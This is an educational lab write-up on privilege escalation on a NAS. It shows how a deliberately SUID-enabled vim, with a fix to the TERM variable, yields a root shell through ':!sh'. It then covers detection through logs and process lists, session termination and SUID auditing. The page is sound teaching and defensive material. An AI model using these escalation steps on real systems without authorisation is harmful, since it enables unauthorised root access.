Cybersecurity · NAS Security Attack & Defense Lab · Lab 3 — Privilege Escalation

Lab 3 — Privilege Escalation

Exploit: misconfigured SUID on vim to gain root. Detect via logs and process list; respond by killing sessions and hardening.

Scenario

Following the successful SSH compromise in Lab 2, access was upgraded from a BSD shell to a Meterpreter session. The user lacks root privileges, so the next step is privilege escalation. For this lab, the vim binary is intentionally misconfigured with the SUID bit to demonstrate a common escalation path.

SUID: What It Is

The SUID (Set User ID) permission causes an executable to run with the file owner’s privileges, not the caller’s. It appears as an s in the owner’s execute position in ls -l output.

-rwsr-xr-x 1 root root 12345 Dec 27 12:00 example_program

When a non-root user runs example_program, it executes with root privileges. Misconfiguring SUID on powerful binaries (like editors or shells) can enable trivial escalation.

Offensive

From Meterpreter, spawn an interactive shell:

/bin/sh -i

Spawning an interactive /bin/sh from Meterpreter — Interactive shell obtained.

Initially, vim behaved oddly inside this pseudo-tty (missing editor commands). Inspecting environment variables revealed the TERM variable was unset.

Environment inspection showing missing TERM variable — `TERM` not set.

Exporting TERM=xterm so vim behaves correctly — Fixing terminal with `export TERM=xterm`.

With SUID on vim, invoking a shell from inside the editor yields a root shell:

vim
:!sh

Using :!sh inside vim to spawn a shell — `:!sh` spawns a privileged shell.

Proof of root after exploiting SUID vim — Root access confirmed.

Defensive

Incident Detection

Review authentication and command logs to confirm abuse of vim to spawn a shell:

Logs showing vim execution with -c /bin/sh and sudo attempts — Log events highlight suspicious `vim` usage launching `/bin/sh`.

Correlate with process listings to confirm interactive shells and ownership changes:

ps aux output showing shells under ronny and root, indicating escalation — Processes show escalation from user `ronny` to `root`.

Response

Terminate malicious sessions and clean up. Kill processes tied to the compromised user and any suspicious root shells:

Killing processes tied to the compromised session — Stopping rogue shells and sessions.

On the attacker side, access is lost:

Attacker session terminated after defensive actions — Command terminated after response actions.

Privilege Escalation via SUID & Environment

This lab demonstrates how a misconfigured SUID binary and an improperly configured environment (TERM) can be combined to achieve root. While production systems rarely ship with SUID on editors, legacy systems and ad-hoc admin changes can introduce these flaws. The workflow mirrors real assessments: identify SUID candidates, fix environment/pty issues, and pivot to a root shell.

Real-World Takeaways

Audit SUID binaries regularly; remove SUID from unnecessary tools (especially editors, interpreters).
Harden shells and terminal handling in constrained environments (proper PTY, env sanitization).
Monitor for suspicious command lines (e.g., editors launching shells) and unusual root-owned interactive shells.

Back to NAS Security Attack & Defense Lab